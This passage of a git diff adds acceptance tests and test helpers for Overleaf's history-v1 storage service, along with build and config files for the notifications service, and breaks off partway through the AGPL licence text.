history = new History(snapshot, [secondChange]) + const currentChunk = new Chunk(history, 1) + expect(result).to.deep.equal({ + numberOfChangesPersisted: 2, + originalEndVersion: 0, + currentChunk, + }) + + const chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getStartVersion()).to.equal(1) + expect(chunk.getEndVersion()).to.equal(2) + expect(chunk.getChanges().length).to.equal(1) + }) + + it('persists the snapshot at the start of the chunk', async function () { + const limitsToPersistImmediately = { + maxChunkChanges: 2, + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + const projectId = fixtures.docs.uninitializedProject.id + const firstChange = new Change( + [new AddFileOperation('a.tex', File.fromString(''))], + new Date(), + [] + ) + const secondChange = new Change( + [new AddFileOperation('b.tex', File.fromString(''))], + new Date(), + [] + ) + const changes = [firstChange, secondChange] + + await chunkStore.initializeProject(projectId) + const result = await persistChanges( + projectId, + changes, + limitsToPersistImmediately, + 0 + ) + + const history = new History(new Snapshot(), changes) + const currentChunk = new Chunk(history, 0) + expect(result).to.deep.equal({ + numberOfChangesPersisted: 2, + originalEndVersion: 0, + currentChunk, + }) + + const chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getStartVersion()).to.equal(0) + expect(chunk.getEndVersion()).to.equal(2) + expect(chunk.getChanges().length).to.equal(2) + }) + + it("errors if the version doesn't match the latest chunk", async function () { + const limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + const projectId = fixtures.docs.uninitializedProject.id + const firstChange = new Change( + [new AddFileOperation('a.tex', File.fromString(''))], + new Date(), + [] + ) + const secondChange = new Change( + [new AddFileOperation('b.tex', File.fromString(''))], + new Date(), + [] + ) + const changes = [firstChange, secondChange] + + await chunkStore.initializeProject(projectId) + await expect( + persistChanges(projectId, changes, limitsToPersistImmediately, 1) + ).to.be.rejectedWith( + 'client sent updates with end_version 1 but latest chunk has end_version 0' + ) + }) + + describe('content hash validation', function () { + it('acccepts a change with a valid hash', async function () { + const limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + + const projectId = fixtures.docs.uninitializedProject.id + await chunkStore.initializeProject(projectId) + const textOperation = new TextOperation() + textOperation.insert('hello ') + textOperation.retain(5) + textOperation.contentHash = hashString('hello world') + const change = new Change( + [ + new AddFileOperation('a.tex', File.fromString('world')), + new EditFileOperation('a.tex', textOperation), + ], + new Date(), + [] + ) + const changes = [change] + + const result = await persistChanges( + projectId, + changes, + limitsToPersistImmediately, + 0 + ) + expect(result.numberOfChangesPersisted).to.equal(1) + }) + + it('rejects a change with an invalid hash', async function () { + const limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + } + + const projectId = fixtures.docs.uninitializedProject.id + await chunkStore.initializeProject(projectId) + const textOperation = new TextOperation() + textOperation.insert('hello ') + textOperation.retain(5) + textOperation.contentHash = hashString('bad hash') + const change = new Change( + [ + new AddFileOperation('a.tex', File.fromString('world')), + new EditFileOperation('a.tex', textOperation), + ], + new Date(), + [] + ) + const changes = [change] + + await expect( + persistChanges(projectId, changes, limitsToPersistImmediately, 0) + ).to.be.rejectedWith(storage.InvalidChangeError) + }) + }) +}) + +function hashString(s) { + const hash = createHash('sha-1') + hash.update(s) + return hash.digest('hex') +} diff --git a/services/history-v1/test/acceptance/js/storage/project_archive.test.js b/services/history-v1/test/acceptance/js/storage/project_archive.test.js new file mode 100644 index 0000000..d9112b1 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/project_archive.test.js @@ -0,0 +1,208 @@ +'use strict' + +const _ = require('lodash') +const BPromise = require('bluebird') +const { expect } = require('chai') +const fs = BPromise.promisifyAll(require('node:fs')) +const sinon = require('sinon') +const stream = require('node:stream') +const temp = require('temp') + +const cleanup = require('./support/cleanup') +const fixtures = require('./support/fixtures') +const testFiles = require('./support/test_files') +const unzip = require('./support/unzip') + +const core = require('overleaf-editor-core') +const File = core.File +const Snapshot = core.Snapshot + +const storage = require('../../../../storage') +const BlobStore = storage.BlobStore +const ProjectArchive = storage.ProjectArchive + +describe('ProjectArchive', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + const projectId = '123' + const blobStore = new BlobStore(projectId) + + let zipFilePath + beforeEach(function () { + zipFilePath = temp.path({ suffix: '.zip' }) + }) + afterEach(function () { + return fs.unlinkAsync(zipFilePath).catch(() => {}) + }) + + function makeMixedTestSnapshot(rounds) { + const snapshot = new Snapshot() + + return blobStore.putFile(testFiles.path('graph.png')).then(() => { + _.times(rounds, i => { + snapshot.addFile('test' + i + '.txt', File.fromString('test')) + snapshot.addFile( + 'graph' + i + '.png', + File.fromHash(testFiles.GRAPH_PNG_HASH) + ) + }) + return snapshot + }) + } + + function makeTextTestSnapshot(rounds) { + const snapshot = new Snapshot() + _.times(rounds, i => { + snapshot.addFile('test' + i + '.txt', File.fromString('test')) + }) + return snapshot + } + + it('archives a small snapshot with binary and text data', function () { + return makeMixedTestSnapshot(1) + .then(snapshot => { + const projectArchive = new ProjectArchive(snapshot) + return projectArchive.writeZip(blobStore, zipFilePath) + }) + .then(() => { + return unzip.getZipEntries(zipFilePath) + }) + .then(zipEntries => { + expect(zipEntries).to.have.length(2) + zipEntries = _.sortBy(zipEntries, 'fileName') + expect(zipEntries[0].fileName).to.equal('graph0.png') + expect(zipEntries[0].uncompressedSize).to.equal( + testFiles.GRAPH_PNG_BYTE_LENGTH + ) + expect(zipEntries[1].fileName).to.equal('test0.txt') + expect(zipEntries[1].uncompressedSize).to.equal(4) + }) + }) + + it('archives a larger snapshot with binary and text data', function () { + return makeMixedTestSnapshot(10) + .then(snapshot => { + const projectArchive = new ProjectArchive(snapshot) + return projectArchive.writeZip(blobStore, zipFilePath) + }) + .then(() => { + return unzip.getZipEntries(zipFilePath) + }) + .then(zipEntries => { + expect(zipEntries).to.have.length(20) + }) + }) + + it('archives empty files', function () { + const snapshot = new Snapshot() + snapshot.addFile('test0', File.fromString('')) + snapshot.addFile('test1', File.fromHash(File.EMPTY_FILE_HASH)) + + return blobStore + .putString('') + .then(() => { + const projectArchive = new ProjectArchive(snapshot) + return projectArchive.writeZip(blobStore, zipFilePath) + }) + .then(() => { + return unzip.getZipEntries(zipFilePath) + }) + .then(zipEntries => { + zipEntries = _.sortBy(zipEntries, 'fileName') + expect(zipEntries[0].fileName).to.equal('test0') + expect(zipEntries[0].uncompressedSize).to.equal(0) + expect(zipEntries[1].fileName).to.equal('test1') + expect(zipEntries[1].uncompressedSize).to.equal(0) + }) + }) + + describe('with a blob stream download error', function () { + beforeEach(function () { + const testStream = new stream.Readable({ + read: function () { + testStream.destroy(new Error('test read error')) + }, + }) + sinon.stub(blobStore, 'getStream').resolves(testStream) + }) + + afterEach(function () { + blobStore.getStream.restore() + }) + + it('rejects with the error', function () { + return makeMixedTestSnapshot(1) + .then(snapshot => { + const projectArchive = new ProjectArchive(snapshot) + return projectArchive.writeZip(blobStore, zipFilePath) + }) + .then(() => { + expect.fail() + }) + .catch(err => { + let message = err.message + if (err instanceof ProjectArchive.DownloadError) { + message = err.cause.message + } + expect(message).to.match(/test read error/) + }) + }) + }) + + describe('with zip write error', function () { + beforeEach(function () { + sinon.stub(fs, 'createWriteStream').callsFake(path => { + const testStream = new stream.Writable({ + write: function (chunk, encoding, callback) { + callback(new Error('test write error')) + }, + }) + return testStream + }) + }) + + afterEach(function () { + fs.createWriteStream.restore() + }) + + it('rejects with the error', function () { + return makeMixedTestSnapshot(1) + .then(snapshot => { + const projectArchive = new ProjectArchive(snapshot) + return projectArchive.writeZip(blobStore, zipFilePath) + }) + .then(() => { + expect.fail() + }) + .catch(err => { + expect(err.message).to.equal('test write error') + }) + }) + }) + + describe('with a delayed file load', function () { + beforeEach(function () { + sinon.stub(File.prototype, 'load').callsFake(function () { + return BPromise.delay(200).thenReturn(this) + }) + }) + + afterEach(function () { + File.prototype.load.restore() + }) + + it('times out', function () { + const snapshot = makeTextTestSnapshot(10) + const projectArchive = new ProjectArchive(snapshot, 100) + return projectArchive + .writeZip(blobStore, zipFilePath) + .then(() => { + expect.fail() + }) + .catch(err => { + expect(err.name).to.equal('ArchiveTimeout') + }) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/project_key.test.js b/services/history-v1/test/acceptance/js/storage/project_key.test.js new file mode 100644 index 0000000..4aa6c1f --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/project_key.test.js @@ -0,0 +1,21 @@ +'use strict' + +const { expect } = require('chai') + +const { format, pad } = require('../../../../storage/lib/project_key') + +describe('projectKey', function () { + it('reverses padded keys', function () { + expect(format(1)).to.equal('100/000/000') + expect(format(12)).to.equal('210/000/000') + expect(format(123456789)).to.equal('987/654/321') + expect(format(9123456789)).to.equal('987/654/3219') + }) + + it('pads numbers with zeros to length 9', function () { + expect(pad(1)).to.equal('000000001') + expect(pad(10)).to.equal('000000010') + expect(pad(100000000)).to.equal('100000000') + expect(pad(1000000000)).to.equal('1000000000') + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/support/cleanup.js b/services/history-v1/test/acceptance/js/storage/support/cleanup.js new file mode 100644 index 0000000..55829be --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/support/cleanup.js @@ -0,0 +1,101 @@ +const config = require('config') + +const { knex, persistor, mongodb, redis } = require('../../../../../storage') +const { S3Persistor } = require('@overleaf/object-persistor/src/S3Persistor') + +const POSTGRES_TABLES = [ + 'chunks', + 'project_blobs', + 'old_chunks', + 'pending_chunks', +] + +const MONGO_COLLECTIONS = [ + 'projectHistoryGlobalBlobs', + 'projectHistoryBlobs', + 'projectHistoryShardedBlobs', + 'projectHistoryChunks', + + // back_fill_file_hash.test.mjs + 'deletedFiles', + 'deletedProjects', + 'projects', + 'projectHistoryBackedUpBlobs', +] + +// make sure we don't delete the wrong data by accident +if (process.env.NODE_ENV !== 'test') { + throw new Error('test cleanup can only be loaded in a test environment') +} + +async function cleanupPostgres() { + for (const table of POSTGRES_TABLES) { + await knex(table).del() + } +} + +async function cleanupMongo() { + const collections = await mongodb.db.listCollections().map(c => c.name) + for await (const collection of collections) { + if (MONGO_COLLECTIONS.includes(collection)) { + await mongodb.db.collection(collection).deleteMany({}) + } + } +} + +async function cleanupRedis() { + await redis.rclientHistory.flushdb() + await redis.rclientLock.flushdb() +} + +async function cleanupPersistor() { + await Promise.all([ + clearBucket(config.get('blobStore.globalBucket')), + clearBucket(config.get('blobStore.projectBucket')), + clearBucket(config.get('chunkStore.bucket')), + clearBucket(config.get('zipStore.bucket')), + ]) +} + +async function clearBucket(name) { + await persistor.deleteDirectory(name, '') +} + +let s3PersistorForBackupCleanup + +async function cleanupBackup() { + // The backupPersistor refuses to delete short prefixes. Use a low-level S3 persistor. + if (!s3PersistorForBackupCleanup) { + const { backupPersistor } = await import( + '../../../../../storage/lib/backupPersistor.mjs' + ) + s3PersistorForBackupCleanup = new S3Persistor(backupPersistor.settings) + } + await Promise.all( + Object.values(config.get('backupStore')).map(name => + s3PersistorForBackupCleanup.deleteDirectory(name, '') + ) + ) +} + +async function cleanupEverything() { + // Set the timeout when called in a Mocha test. This function is also called + // in benchmarks where it is not passed a Mocha context. + this.timeout?.(5000) + await Promise.all([ + cleanupPostgres(), + cleanupMongo(), + cleanupPersistor(), + cleanupBackup(), + cleanupRedis(), + ]) +} + +module.exports = { + postgres: cleanupPostgres, + mongo: cleanupMongo, + persistor: cleanupPersistor, + backup: cleanupBackup, + redis: cleanupRedis, + everything: cleanupEverything, +} diff --git a/services/history-v1/test/acceptance/js/storage/support/fetch.js b/services/history-v1/test/acceptance/js/storage/support/fetch.js new file mode 100644 index 0000000..316f521 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/support/fetch.js @@ -0,0 +1,6 @@ +const BPromise = require('bluebird') +const fetch = require('node-fetch') + +fetch.Promise = BPromise + +module.exports = fetch diff --git a/services/history-v1/test/acceptance/js/storage/support/fixtures.js b/services/history-v1/test/acceptance/js/storage/support/fixtures.js new file mode 100644 index 0000000..f077b3e --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/support/fixtures.js @@ -0,0 +1,20 @@ +'use strict' + +const BPromise = require('bluebird') +const dbSpecs = require('../fixtures').dbSpecs +const knex = require('../../../../../storage').knex +const historyStore = require('../../../../../storage').historyStore + +function createFixtures() { + return knex('chunks') + .insert(dbSpecs.chunks) + .then(() => { + return BPromise.mapSeries(dbSpecs.histories, history => + historyStore.storeRaw(history.projectId, history.chunkId, history.json) + ) + }) +} + +exports.create = createFixtures +exports.chunks = require('../fixtures/chunks').chunks +exports.docs = require('../fixtures/docs').docs diff --git a/services/history-v1/test/acceptance/js/storage/support/test_files.js b/services/history-v1/test/acceptance/js/storage/support/test_files.js new file mode 100644 index 0000000..c28443c --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/support/test_files.js @@ -0,0 +1,27 @@ +const path = require('node:path') + +exports.path = function (pathname) { + return path.join(__dirname, '..', 'files', pathname) +} + +exports.GRAPH_PNG_HASH = '81dac49dc128aa0a7d0263d24c0d1ce14de554a8' +exports.GRAPH_PNG_BYTE_LENGTH = 13476 + +exports.HELLO_TXT_HASH = '80dc915a94d134320281f2a139c018facce4b670' +exports.HELLO_TXT_BYTE_LENGTH = 11 +exports.HELLO_TXT_UTF8_LENGTH = 10 + +// file is UTF-8 encoded and contains non BMP characters +exports.NON_BMP_TXT_HASH = '323ec6325a14288a81e15bc0bbee0c0a35f38049' +exports.NON_BMP_TXT_BYTE_LENGTH = 57 + +// files contains null characters +exports.NULL_CHARACTERS_TXT_HASH = '4227ca4e8736af63036e7457e2db376ddf7e5795' +exports.NULL_CHARACTERS_TXT_BYTE_LENGTH = 3 + +// git hashes of some short strings for testing +exports.STRING_A_HASH = '2e65efe2a145dda7ee51d1741299f848e5bf752e' +exports.STRING_AB_HASH = '9ae9e86b7bd6cb1472d9373702d8249973da0832' + +// From https://en.wikipedia.org/wiki/Portable_Network_Graphics +exports.PNG_MAGIC_NUMBER = '89504e470d0a1a0a' diff --git a/services/history-v1/test/acceptance/js/storage/support/unzip.js b/services/history-v1/test/acceptance/js/storage/support/unzip.js new file mode 100644 index 0000000..c89c3d4 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/support/unzip.js @@ -0,0 +1,22 @@ +'use strict' + +const BPromise = require('bluebird') +const yauzl = BPromise.promisifyAll(require('yauzl')) + +function getZipEntries(pathname) { + function readEntries(zip) { + return new BPromise((resolve, reject) => { + const entries = [] + zip.on('entry', entry => { + entries.push(entry) + }) + zip.on('error', reject) + zip.on('end', () => { + resolve(entries) + }) + }) + } + return yauzl.openAsync(pathname).then(readEntries) +} + +exports.getZipEntries = getZipEntries diff --git a/services/history-v1/test/acceptance/js/storage/tasks.test.js b/services/history-v1/test/acceptance/js/storage/tasks.test.js new file mode 100644 index 0000000..e43bdac --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/tasks.test.js @@ -0,0 +1,115 @@ +'use strict' + +const { ObjectId } = require('mongodb') +const { expect } = require('chai') +const config = require('config') +const tasks = require('../../../../storage/tasks') +const { + persistor, + historyStore, + knex, + mongodb, +} = require('../../../../storage') +const cleanup = require('./support/cleanup') + +const CHUNK_STORE_BUCKET = config.get('chunkStore.bucket') +const postgresProjectId = 1 +const mongoProjectId = new ObjectId('abcdefabcdefabcdefabcdef') + +describe('tasks', function () { + beforeEach(cleanup.everything) + + const options = { + batchSize: 3, + timeout: 3000, + minAgeSecs: 3600, + maxBatches: 1000, + } + + it('deletes old chunks', async function () { + const postgresChunks = [] + const mongoChunks = [] + + for (let i = 1; i <= 25; i++) { + const deletedAt = new Date(Date.now() - 86400000) + const startVersion = (i - 1) * 10 + const endVersion = i * 10 + postgresChunks.push({ + chunk_id: i, + doc_id: postgresProjectId, + start_version: startVersion, + end_version: endVersion, + deleted_at: deletedAt, + }) + mongoChunks.push({ + _id: new ObjectId(i.toString().padStart(24, '0')), + projectId: mongoProjectId, + startVersion, + endVersion, + state: 'deleted', + updatedAt: deletedAt, + }) + } + + for (let i = 26; i <= 30; i++) { + const deletedAt = new Date() + const startVersion = (i - 1) * 10 + const endVersion = i * 10 + postgresChunks.push({ + chunk_id: i, + doc_id: postgresProjectId, + start_version: startVersion, + end_version: endVersion, + deleted_at: deletedAt, + }) + mongoChunks.push({ + _id: new ObjectId(i.toString().padStart(24, '0')), + projectId: mongoProjectId, + startVersion, + endVersion, + state: 'deleted', + updatedAt: deletedAt, + }) + } + + await knex('old_chunks').insert(postgresChunks) + await mongodb.chunks.insertMany(mongoChunks) + await Promise.all([ + ...postgresChunks.map(chunk => + historyStore.storeRaw( + postgresProjectId.toString(), + chunk.chunk_id.toString(), + { + history: 'raw history', + } + ) + ), + ...mongoChunks.map(chunk => + historyStore.storeRaw(mongoProjectId.toString(), chunk._id.toString(), { + history: 'raw history', + }) + ), + ]) + await expectChunksExist(1, 30, true) + await tasks.deleteOldChunks(options) + await expectChunksExist(1, 25, false) + await expectChunksExist(26, 30, true) + }) +}) + +async function expectChunksExist(minChunkId, maxChunkId, expected) { + const keys = [] + for (let i = minChunkId; i <= maxChunkId; i++) { + keys.push(`100/000/000/${i.toString().padStart(9, '0')}`) + keys.push(`fed/cba/fedcbafedcbafedcba/${i.toString().padStart(24, '0')}`) + } + return await Promise.all( + keys.map(async key => { + const exists = await persistor.checkIfObjectExists( + CHUNK_STORE_BUCKET, + key + ) + expect(exists).to.equal(expected) + }) + ) +} diff --git a/services/history-v1/test/acceptance/js/storage/zip_store.test.js b/services/history-v1/test/acceptance/js/storage/zip_store.test.js new file mode 100644 index 0000000..255751a --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/zip_store.test.js @@ -0,0 +1,101 @@ +'use strict' + +const BPromise = require('bluebird') +const { expect } = require('chai') +const fs = BPromise.promisifyAll(require('node:fs')) +const temp = require('temp') + +const cleanup = require('./support/cleanup') +const fetch = require('./support/fetch') +const fixtures = require('./support/fixtures') +const { getZipEntries } = require('./support/unzip') + +const { Snapshot, File } = require('overleaf-editor-core') + +const { zipStore } = require('../../../../storage') + +describe('zipStore', function () { + beforeEach(cleanup.persistor) + + let zipFilePath + beforeEach(function () { + zipFilePath = temp.path({ suffix: '.zip' }) + }) + afterEach(async function () { + try { + await fs.unlinkAsync(zipFilePath) + } catch (_error) { + // Ignore. + } + }) + + it('stores a snapshot in a zip file', async function () { + const projectId = fixtures.docs.uninitializedProject.id + const version = 1 + const testSnapshot = new Snapshot() + testSnapshot.addFile('hello.txt', File.fromString('hello world')) + + const zipUrl = await zipStore.getSignedUrl(projectId, version) + + // Initially, there is no zip file; we should get a 404. + const preZipResponse = await fetch(zipUrl) + expect(preZipResponse.status).to.equal(404) + + // Build the zip file. + await zipStore.storeZip(projectId, version, testSnapshot) + + // Now we should be able to fetch it. + const postZipResponse = await fetch(zipUrl) + expect(postZipResponse.status).to.equal(200) + const zipBuffer = await postZipResponse.buffer() + await fs.writeFileAsync(zipFilePath, zipBuffer) + const entries = await getZipEntries(zipFilePath) + expect(entries.length).to.equal(1) + expect(entries[0].fileName).to.equal('hello.txt') + }) + + it('filters out tracked deletes', async function () { + const projectId = fixtures.docs.uninitializedProject.id + const version = 1 + const testSnapshot = new Snapshot() + testSnapshot.addFile( + 'test.tex', + File.fromRaw({ + content: 'the quick brown fox jumps over the lazy dog', + trackedChanges: [ + { + range: { pos: 4, length: 6 }, + tracking: { + type: 'delete', + ts: '2024-01-01T00:00:00.000Z', + userId: 'user1', + }, + }, + { + range: { pos: 35, length: 5 }, + tracking: { + type: 'delete', + ts: '2023-01-01T00:00:00.000Z', + userId: 'user2', + }, + }, + ], + }) + ) + + const zipUrl = await zipStore.getSignedUrl(projectId, version) + // Build the zip file. + await zipStore.storeZip(projectId, version, testSnapshot) + // Now we should be able to fetch it. + const postZipResponse = await fetch(zipUrl) + expect(postZipResponse.status).to.equal(200) + const zipBuffer = await postZipResponse.buffer() + await fs.writeFileAsync(zipFilePath, zipBuffer) + const entries = await getZipEntries(zipFilePath) + expect(entries.length).to.equal(1) + expect(entries[0].fileName).to.equal('test.tex') + expect(entries[0].uncompressedSize).to.equal( + 'the brown fox jumps over the dog'.length + ) + }) +}) diff --git a/services/history-v1/test/acceptance/pg-init/set-up-readOnly-user.sql b/services/history-v1/test/acceptance/pg-init/set-up-readOnly-user.sql new file mode 100644 index 0000000..3a1abf3 --- /dev/null +++ b/services/history-v1/test/acceptance/pg-init/set-up-readOnly-user.sql @@ -0,0 +1,2 @@ +CREATE USER read_only PASSWORD 'password'; +ALTER DEFAULT PRIVILEGES FOR USER overleaf IN SCHEMA public GRANT SELECT ON TABLES TO read_only; diff --git a/services/history-v1/test/setup.js b/services/history-v1/test/setup.js new file mode 100644 index 0000000..6097417 --- /dev/null +++ b/services/history-v1/test/setup.js @@ -0,0 +1,67 @@ +const chai = require('chai') +const chaiAsPromised = require('chai-as-promised') +const config = require('config') +const fetch = require('node-fetch') +const { knex, mongodb, redis } = require('../storage') + +// ensure every ObjectId has the id string as a property for correct comparisons +require('mongodb').ObjectId.cacheHexString = true + +chai.use(chaiAsPromised) +chai.config.truncateThreshold = 0 + +async function setupPostgresDatabase() { + this.timeout(60_000) + await knex.migrate.latest() +} + +async function setupMongoDatabase() { + this.timeout(60_000) + await mongodb.db.collection('projectHistoryChunks').createIndexes([ + { + key: { projectId: 1, startVersion: 1 }, + name: 'projectId_1_startVersion_1', + partialFilterExpression: { state: { $in: ['active', 'closed'] } }, + unique: true, + }, + { + key: { state: 1 }, + name: 'state_1', + partialFilterExpression: { state: 'deleted' }, + }, + ]) +} + +async function createGcsBuckets() { + this.timeout(60_000) + for (const bucket of [ + config.get('blobStore.globalBucket'), + config.get('blobStore.projectBucket'), + config.get('chunkStore.bucket'), + config.get('zipStore.bucket'), + 'fake-user-files-gcs', + ]) { + await fetch('http://gcs:9090/storage/v1/b', { + method: 'POST', + body: JSON.stringify({ name: bucket }), + headers: { 'Content-Type': 'application/json' }, + }) + } +} + +// Tear down the connection pool after all the tests have run, so the process +// can exit. +async function tearDownConnectionPool() { + await knex.destroy() + await redis.disconnect() +} + +module.exports = { + setupPostgresDatabase, + createGcsBuckets, + tearDownConnectionPool, + mochaHooks: { + beforeAll: [setupPostgresDatabase, setupMongoDatabase, createGcsBuckets], + afterAll: [tearDownConnectionPool], + }, +} diff --git a/services/history-v1/tsconfig.json b/services/history-v1/tsconfig.json new file mode 100644 index 0000000..0e20309 --- /dev/null +++ b/services/history-v1/tsconfig.json @@ -0,0 +1,18 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "api/**/*", + "app.js", + "app/js/**/*", + "backup-deletion-app.mjs", + "backup-verifier-app.mjs", + "backup-worker-app.mjs", + "benchmarks/**/*", + "config/**/*", + "migrations/**/*", + "scripts/**/*", + "storage/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/notifications/.gitignore b/services/notifications/.gitignore new file mode 100644 index 0000000..8a030e9 --- /dev/null +++ b/services/notifications/.gitignore @@ -0,0 +1,54 @@ +Compiled source # +################### +*.com +*.class +*.dll +*.exe +*.o +*.so + +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.jar +*.rar +*.tar +*.zip + +# Logs and databases # +###################### +*.log +*.sql +*.sqlite + +# OS generated files # +###################### +.DS_Store? +ehthumbs.db +Icon? +Thumbs.db + +node_modules/* +data/* + +cookies.txt +UserAndProjectPopulator.coffee + +public/stylesheets/style.css + +Gemfile.lock + +*.swp +.DS_Store + +app/views/external + +/modules/ + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/notifications/.mocharc.json b/services/notifications/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/notifications/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/notifications/.nvmrc b/services/notifications/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/notifications/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/notifications/Dockerfile b/services/notifications/Dockerfile new file mode 100644 index 0000000..16a5c44 --- /dev/null +++ b/services/notifications/Dockerfile @@ -0,0 +1,27 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/notifications + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/notifications/package.json /overleaf/services/notifications/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/notifications/ /overleaf/services/notifications/ + +FROM app +USER node + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/notifications/LICENSE b/services/notifications/LICENSE new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/services/notifications/LICENSE @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside 